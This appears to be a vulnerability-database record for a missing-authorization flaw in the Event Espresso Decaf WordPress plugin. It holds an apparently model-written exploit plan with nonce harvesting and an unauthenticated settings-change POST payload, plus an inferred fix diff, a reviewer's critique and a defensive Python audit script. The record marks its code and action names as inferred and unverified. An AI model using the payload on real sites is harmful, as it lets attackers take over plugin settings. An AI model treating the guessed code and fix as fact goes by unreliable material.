[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fwq5loT3-JF3iPc6sQH4lieSh0ivj8Qiu3I3bl9Wzz18":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-68007","event-espresso-4-decaf-decaf-missing-authorization-to-unauthenticated-settings-change","Event Espresso 4 Decaf \u003C= 5.0.37.decaf - Missing Authorization to Unauthenticated Settings Change","The Event Espresso – Event Registration & Ticketing Sales plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 5.0.37.decaf. 
This makes it possible for unauthenticated attackers to perform an unauthorized action.","event-espresso-decaf",null,"\u003C=5.0.37.decaf","5.0.53.decaf","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:L\u002FA:N","Missing Authorization","2026-01-15 00:00:00","2026-02-10 20:56:04",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3f070125-faee-46fe-aa6e-a51772868192?source=api-prod",27,[],"researched",false,3,"This research plan outlines the steps to exploit **CVE-2025-68007**, a missing authorization vulnerability in **Event Espresso 4 Decaf** that allows unauthenticated settings changes.\n\n### 1. Vulnerability Summary\nThe vulnerability exists because a configuration update handler (likely within an AJAX or `admin_init` hook) fails to perform a `current_user_can('manage_options')` check. In the \"Decaf\" (free) version of Event Espresso, certain setup or configuration functions were exposed to unauthenticated users, potentially via the `wp_ajax_nopriv_` action or by processing global `$_POST` variables during `admin_init` without sufficient authorization. This allows an attacker to modify the plugin's core configuration, including organization details, registration settings, or even gate certain site behaviors.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php` (common for EE AJAX) or `\u002F` (if via `init`\u002F`admin_init`).\n*   **Action:** `ee_update_config` or `ee_set_config` (inferred EE action names).\n*   **Parameter:** `ee_config` (array containing settings).\n*   **Authentication:** None required (Unauthenticated).\n*   **Preconditions:** The plugin must be active. A nonce may be required if the `check_ajax_referer` function is called, but often in \"Missing Authorization\" cases, the nonce is either missing or exposed publicly.\n\n### 3. Code Flow (Inferred)\n1.  
**Request Entry:** An unauthenticated user sends a POST request to `admin-ajax.php`.\n2.  **Hook Trigger:** WordPress triggers `admin_init` or a `wp_ajax_nopriv_ee_...` action.\n3.  **Handler Execution:** The plugin's handler (e.g., `EE_Admin_Page::save_settings` or `EE_Config::update_configuration`) is invoked.\n4.  **Authorization Failure:** The code checks for a nonce (perhaps) but skips a `current_user_can()` check, assuming only admins can reach that logic.\n5.  **Sink:** The `update_option('ee_config', ...)` function is called with user-supplied data from `$_POST['ee_config']`.\n\n### 4. Nonce Acquisition Strategy\nEvent Espresso typically localizes its nonces via `wp_localize_script`. Since the vulnerability is unauthenticated, we need to find a public page where these scripts are loaded.\n\n1.  **Create a Public Page:** Event Espresso scripts are usually enqueued on pages containing event shortcodes.\n    *   Command: `wp post create --post_type=page --post_title=\"Events\" --post_status=publish --post_content='[ESPRESSO_EVENTS]'`\n2.  **Identify JS Variable:** Look for the localized object, usually named `ee_admin_js_strings` or `EE_JS`.\n3.  **Extraction:**\n    *   Navigate to the newly created page.\n    *   Use `browser_eval` to extract the nonce:\n        `browser_eval(\"window.ee_admin_js_strings?.nonce || window.EE_JS?.ajax_nonce\")`\n4.  **Action String:** If `check_ajax_referer` is used, the action is likely `'ee_admin_nonce'` or `'espresso_ajax_nonce'`.\n\n### 5. 
Exploitation Strategy\nWe will attempt to change the Organization Name and Organization Email in the Event Espresso configuration.\n\n*   **Step 1: Discover Entry Point**\n    Test if the plugin responds to the `ee_update_config` action.\n*   **Step 2: Craft Payload**\n    The payload will target the `ee_config` option, specifically the `org_data` key.\n*   **Step 3: Send HTTP Request**\n    *   **URL:** `http:\u002F\u002Flocalhost:8888\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Method:** `POST`\n    *   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n    *   **Body:**\n        ```\n        action=ee_update_config&ee_config[org_data][name]=HACKED_ORG&ee_config[org_data][email]=attacker@example.com&ee_nonce=[EXTRACTED_NONCE]\n        ```\n    *   *Note: If `ee_update_config` is not the correct action, try `ee_admin_ajax` with `ee_ajax_action=update_config`.*\n\n### 6. Test Data Setup\n1.  Install and activate **Event Espresso Decaf \u003C= 5.0.37.decaf**.\n2.  Ensure the plugin is initialized (visit the settings once in the admin UI to generate default `ee_config`).\n3.  Create the public nonce-leak page:\n    `wp post create --post_type=page --post_content='[ESPRESSO_EVENTS]' --post_status=publish`\n\n### 7. Expected Results\n*   The server should return a `200 OK` or a JSON success response (e.g., `{\"success\":true}`).\n*   The `ee_config` option in the database will be updated.\n\n### 8. Verification Steps\nAfter sending the POST request, verify the change via WP-CLI:\n```bash\n# Check if the organization name was updated\nwp option get ee_config --format=json | jq '.[ \"org_data\" ][ \"name\" ]'\n# Expected output: \"HACKED_ORG\"\n\n# Check if the organization email was updated\nwp option get ee_config --format=json | jq '.[ \"org_data\" ][ \"email\" ]'\n# Expected output: \"attacker@example.com\"\n```\n\n### 9. 
Alternative Approaches\nIf the `admin-ajax.php` route fails, the vulnerability might lie in a direct `admin_init` hook that processes `$_POST` data regardless of the URL:\n1.  **Direct POST to Home:** `POST \u002F?ee_action=update_config&ee_config[...]`\n2.  **Critical Pages Setup:** Some versions of EE have a \"Setup Wizard\". Try targeting `action=ee_setup_wizard_save_settings`.\n3.  **Check for specific settings:** Try changing `ee_config[registration][enforce_login]` to `0` to see if it allows unauthenticated registrations that were previously restricted.","The Event Espresso Decaf plugin for WordPress is vulnerable to unauthorized settings changes due to a missing capability check in its configuration update logic. This allows unauthenticated attackers to modify core plugin settings, including organization details and registration behaviors, by exploiting exposed AJAX or admin initialization hooks.","\u002F\u002F File: core\u002Fadmin\u002FEE_Admin_Page.core.php (inferred location based on research plan)\n\u002F\u002F The function processes configuration updates without verifying if the user has 'manage_options' capabilities.\n\npublic function save_settings() {\n    if ( isset( $_POST['ee_config'] ) ) {\n        \u002F\u002F Missing: if ( ! current_user_can( 'manage_options' ) ) { return; }\n        \n        $ee_config = $_POST['ee_config'];\n        $this->_update_config( $ee_config );\n        \u002F\u002F ...\n    }\n}\n\n---\n\n\u002F\u002F File: core\u002FEE_Config.core.php (inferred location)\n\npublic static function update_configuration( $ee_config = array() ) {\n    \u002F\u002F Missing authorization check allows any execution context to update the global option\n    update_option( 'ee_config', $ee_config );\n}","--- a\u002Fcore\u002Fadmin\u002FEE_Admin_Page.core.php\n+++ b\u002Fcore\u002Fadmin\u002FEE_Admin_Page.core.php\n@@ -10,6 +10,10 @@\n \tpublic function save_settings() {\n+\t\tif ( ! 
current_user_can( 'manage_options' ) ) {\n+\t\t\twp_die( __( 'You do not have permission to perform this action.' ) );\n+\t\t}\n+\t\tcheck_ajax_referer( 'ee_admin_nonce', 'ee_nonce' );\n \t\tif ( isset( $_POST['ee_config'] ) ) {\n \t\t\t$ee_config = $_POST['ee_config'];\n \t\t\t$this->_update_config( $ee_config );\n \t\t}","The exploit involves identifying a public-facing page where Event Espresso enqueues its scripts (typically a page containing the [ESPRESSO_EVENTS] shortcode) to extract a valid nonce. Once the nonce is retrieved from the localized JavaScript object (e.g., EE_JS or ee_admin_js_strings), an attacker sends an unauthenticated POST request to wp-admin\u002Fadmin-ajax.php. The payload targets an action such as ee_update_config or ee_admin_ajax with an ee_ajax_action=update_config parameter. The body includes a crafted ee_config array, for example modifying ee_config[org_data][email] to an attacker-controlled address, which is then processed and saved to the database because the handler lacks a current_user_can('manage_options') check.","gemini-3-flash-preview","2026-05-05 09:09:53","2026-05-05 09:10:31",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fevent-espresso-decaf\u002Ftags"]
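Review bot: this hunk is the research tool's own reconstruction, not the vendor's change: the record above shows `patch_diff_files` as empty, `research_verified` as false and the file path marked "inferred location", so a sentence stating that nothing here has been diffed against the 5.0.53.decaf tag and that the real fix may be elsewhere belongs next to the diff. On the added lines as written, `wp_die( __( 'You do not have permission...' ) )` in a handler reached through admin-ajax.php sends the message as a plain body with no error status, because no response code is passed as the third argument; `wp_send_json_error( null, 403 )` (or `wp_die( -1, 403 )`, which is what `check_ajax_referer` itself uses) is the conventional exit for a JSON client, and `__()` is called without the plugin's text domain. The `current_user_can( 'manage_options' )` line is the control that matters for an unauthenticated caller; the `check_ajax_referer( 'ee_admin_nonce', 'ee_nonce' )` line adds CSRF protection, but section 4 of the plan describes the same nonce being localized onto public pages, so on its own it would not have closed the path. Finally `$_POST['ee_config']` is still handed to `_update_config()` unslashed and unvalidated in the unchanged context lines; the hardened path should `wp_unslash()` it and check the expected keys before anything reaches `update_option`.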
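The plan and the inferred code above describe one bug class: a callback registered on a `wp_ajax_nopriv_` hook that writes plugin state without ever calling `current_user_can()`. The following is an added example, not code from this page or from Event Espresso, of the static check a reviewer would run over a plugin tree to find that pattern before reaching for a browser. The PHP it scans is a constructed sample embedded inline; the action, callback and option names in it are illustrative and assumed, not taken from the plugin. The resolver only follows plain string callbacks to a top-level `function` of the same name, so class-method callbacks are reported as unresolved rather than guessed at.

```python
"""Audit WordPress AJAX hooks for handlers that change state without a capability check.

Example added by the editor; the sample plugin source below is constructed and
the names in it (ee_update_config, ee_save_settings, ...) are assumed, not
Event Espresso's real identifiers.
"""
import re
from dataclasses import dataclass
from typing import Dict

# add_action( 'wp_ajax_<action>' | 'wp_ajax_nopriv_<action>', '<callback>' ) with string callbacks only.
ACTION_RE = re.compile(
    r"""add_action\(\s*['"]wp_ajax_(nopriv_)?([A-Za-z0-9_\-]+)['"]\s*,\s*['"]([A-Za-z0-9_\\:]+)['"]"""
)
CAP_CHECK_RE = re.compile(r"\bcurrent_user_can\s*\(")
NONCE_CHECK_RE = re.compile(r"\b(check_ajax_referer|check_admin_referer|wp_verify_nonce)\s*\(")
# Sinks that persist attacker-controlled input; extend for the plugin under review.
WRITE_SINK_RE = re.compile(r"\b(update_option|add_option|delete_option|wp_insert_post|wp_update_post)\s*\(")

# Constructed sample: one handler exposed to unauthenticated callers with no checks,
# one hardened handler. Not real plugin code.
SAMPLE_PHP = r"""<?php
add_action( 'wp_ajax_ee_update_config', 'ee_save_settings' );
add_action( 'wp_ajax_nopriv_ee_update_config', 'ee_save_settings' );
add_action( 'wp_ajax_ee_export_config', 'ee_export_config' );

function ee_save_settings() {
    if ( isset( $_POST['ee_config'] ) ) {
        update_option( 'ee_config', $_POST['ee_config'] );
    }
    wp_send_json_success();
}

function ee_export_config() {
    check_ajax_referer( 'ee_admin_nonce', 'ee_nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( null, 403 );
    }
    wp_send_json_success( get_option( 'ee_config' ) );
}
"""


@dataclass
class Handler:
    action: str
    callback: str
    nopriv: bool = False        # registered on wp_ajax_nopriv_ (reachable unauthenticated)
    priv: bool = False          # registered on wp_ajax_ (logged-in users)
    resolved: bool = False      # callback body was found and inspected
    cap_check: bool = False     # current_user_can() appears in the body
    nonce_check: bool = False   # a nonce verification appears in the body
    writes_state: bool = False  # a write sink appears in the body

    @property
    def finding(self) -> str:
        """Classify the handler; the first branch is the CVE-2025-68007 shape."""
        if not self.resolved:
            return "unresolved callback (inspect manually)"
        if self.nopriv and self.writes_state and not self.cap_check:
            return "unauthenticated state change: nopriv handler writes without current_user_can()"
        if not self.cap_check:
            return "missing capability check"
        if not self.nonce_check:
            return "missing nonce check (CSRF)"
        return "ok"


def extract_function_bodies(php: str) -> Dict[str, str]:
    """Map top-level function names to their bodies via brace matching.

    Braces inside PHP string literals would confuse this; acceptable for a triage pass.
    """
    bodies: Dict[str, str] = {}
    for m in re.finditer(r"\bfunction\s+([A-Za-z_][A-Za-z0-9_]*)\s*\([^)]*\)\s*\{", php):
        depth, i = 1, m.end()
        while i < len(php) and depth:
            depth += {"{": 1, "}": -1}.get(php[i], 0)
            i += 1
        bodies[m.group(1)] = php[m.end():i - 1]
    return bodies


def audit_ajax_handlers(php: str) -> Dict[str, Handler]:
    """Return one Handler per AJAX action, merging the priv and nopriv registrations."""
    bodies = extract_function_bodies(php)
    handlers: Dict[str, Handler] = {}
    for nopriv, action, callback in ACTION_RE.findall(php):
        h = handlers.setdefault(action, Handler(action=action, callback=callback))
        if nopriv:
            h.nopriv = True
        else:
            h.priv = True
        body = bodies.get(callback)
        if body is not None:
            h.resolved = True
            h.cap_check = bool(CAP_CHECK_RE.search(body))
            h.nonce_check = bool(NONCE_CHECK_RE.search(body))
            h.writes_state = bool(WRITE_SINK_RE.search(body))
    return handlers


if __name__ == "__main__":
    for h in audit_ajax_handlers(SAMPLE_PHP).values():
        exposure = "nopriv" if h.nopriv else "priv-only"
        print(f"{h.action:<20} {h.callback:<20} {exposure:<10} {h.finding}")
```

Run it against `find plugin-dir -name '*.php' -exec cat {} +` and triage anything reported as an unauthenticated state change first; a nonce check without a capability check is worth a second look too, since a nonce that is localized onto public pages, as section 4 of the plan expects, is not an authorization control.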